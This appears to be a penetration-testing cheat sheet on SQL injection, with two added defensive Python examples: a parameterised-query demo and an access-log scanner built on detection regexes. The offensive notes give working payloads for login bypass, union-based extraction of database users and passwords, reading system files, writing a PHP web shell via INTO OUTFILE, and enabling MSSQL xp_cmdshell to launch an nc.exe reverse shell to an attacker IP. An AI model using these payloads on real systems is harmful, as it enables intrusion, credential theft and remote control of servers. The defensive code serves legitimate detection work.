sqli

  • Detection

    add a single quote (') to the parameter; a database error or a changed response suggests the input reaches the query unescaped

  • Auth Bypass

    admin' or 1=1 LIMIT 1;#

    ' or 1=1-- -

    ' or '1'='1

    ' or 1=1 --
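The auth-bypass strings above only work because the login query is assembled by pasting user input into the SQL text. The following is an added example, not code from the original notes: a vulnerable login check beside a parameterised one, run against a constructed in-memory SQLite table (the table, user names and passwords are made up for the demo), showing that the same payload passes the first and fails the second.

```python
import sqlite3

# Constructed sample data standing in for the application's real users table.
# Plaintext passwords are used only to keep the demo short.
SAMPLE_USERS = [("admin", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Create an in-memory database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def login_vulnerable(conn, username, password):
    """The classic bug: input is concatenated into the statement, so a quote in
    the input closes the string literal and the remainder is parsed as SQL."""
    query = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the statement text,
    so a quote in the input is just a character inside a value."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def bypass_check(password):
    """Return (vulnerable_result, safe_result) for a login as 'admin' with the
    given password string, each against a fresh database."""
    conn = make_db()
    return (
        login_vulnerable(conn, "admin", password),
        login_safe(conn, "admin", password),
    )


if __name__ == "__main__":
    # Two of the payloads listed above, plus a genuine and a wrong password.
    for pw in ["' or '1'='1", "' or 1=1-- -", "s3cret", "wrong"]:
        print(repr(pw), "->", bypass_check(pw))
```

The `LIMIT 1;#` variant is MySQL-specific (`#` is not a comment in SQLite), which is why it is not in the demo list; the fix is the same in every dialect: never build the statement from input, bind values instead.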

  • Column Enum

    http://10.11.0.22/debug.php?id=1 **order by 1--**

    This errors once the number exceeds the column count, so increase it until the error appears; the last number that works is the number of columns.

  • Union to get all data

    Suppose there are 3 columns; the following shows which of them are displayed in the output:

    http://10.11.0.22/debug.php?id=1 **union all select 1, 2, 3--**

  • Extract data through union

    Suppose columns 2 and 3 are displayed. This returns the database user and the server version:

    http://10.11.0.22/debug.php?id=1 **union all select 1, user(), @@version**

    Get the database names:

    http://10.11.0.22/debug.php?id=1 **union all select 1, schema_name, 3 from information_schema.schemata**

    List the table names:

    http://10.11.0.22/debug.php?id=1 **union all select 1, table_name, 3 from information_schema.tables**

    This shows only one table, because the page renders a single row. To get all of them in one row, use group_concat, e.g. http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='mysql'

    List the column names of the users table:

    http://10.11.0.22/debug.php?id=1 **union all select 1, 2, column_name from information_schema.columns where table_name='users'**

    Suppose there are two columns, username and password:

    http://10.11.0.22/debug.php?id=1 **union all select 1, username, password from users**

    http://10.11.0.22/debug.php?id=1 **union all select 1, username, password from mysql.users**

  • Code execution

    Depending on the OS, load_file() returns the contents of a local file in the output:

    http://10.11.0.22/debug.php?id=1 **union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')**

    INTO OUTFILE is used to write a file (here a web shell) into the web root:

    http://10.11.0.22/debug.php?id=1 **union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'**

    The query may return an error, but the file is still created. Visit /backdoor.php?cmd=dir to check.

  • Reverse shell

    • Database enumeration is not useful in some cases, so get a reverse shell instead

    • Enable xp_cmdshell (MSSQL)

      • ' EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

    • upload nc.exe from the Linux box to the victim

    • reverse shell

      • nc -nvlp 4444

      • ' EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe 192.168.119.143 4444 -e cmd.exe"' --
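Every payload in the column-enumeration, union, file-write and xp_cmdshell sections above leaves a distinctive string in the web server's access log. The following is an added example, not part of the original notes: a Python scanner that URL-decodes each request target and flags the payload families used above (order by N, union select, information_schema, load_file, into outfile, xp_cmdshell/sp_configure). The log lines, IPs and paths are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined-style); hosts, paths and
# timestamps are made up. The last line is benign and must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /debug.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /debug.php?id=1%20order%20by%205-- HTTP/1.1" 500 233
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /debug.php?id=1%20union%20all%20select%201,user(),@@version HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /debug.php?id=1%20union%20all%20select%201,table_name,3%20from%20information_schema.tables HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /debug.php?id=1%20union%20all%20select%201,2,%22x%22%20into%20OUTFILE%20%27c:/xampp/htdocs/x.php%27 HTTP/1.1" 500 210
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=%27%20EXEC%20sp_configure%20%27xp_cmdshell%27,1;RECONFIGURE;-- HTTP/1.1" 200 100
10.0.0.3 - - [01/Jan/2024:10:00:07 +0000] "GET /products.php?order=by_price HTTP/1.1" 200 2048
"""

# One rule per payload family from the notes above. Whitespace and word
# boundaries keep "order=by_price" from matching the column-enumeration rule.
RULES = [
    ("column-enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\.", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("mssql-cmdshell", re.compile(r"\b(xp_cmdshell|sp_configure)\b", re.I)),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_target(target):
    """Decode twice so single- and double-URL-encoded payloads both normalise;
    a second pass over already-plain text is a no-op."""
    return unquote_plus(unquote_plus(target))


def scan_log(text):
    """Return one finding per log line whose decoded target matches any rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        decoded = decode_target(m.group("target"))
        hits = [name for name, rx in RULES if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "target": decoded,
                "rules": hits,
            })
    return findings


def summarize(findings):
    """Count flagged requests per source IP; a single IP walking through
    column enumeration, union and file-write rules is the pattern to alert on."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["rules"], f["target"])
    print(summarize(found))
```

The 500 responses paired with `order by N` requests are the server-side half of the column-enumeration step; correlating status codes with flagged requests from one IP gives a much stronger signal than any single pattern. Double decoding will also turn a legitimate literal `%25` into `%`, so tune it for the application. Obfuscated variants (inline comments, alternative encodings) need additional normalisation before these rules will match them.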
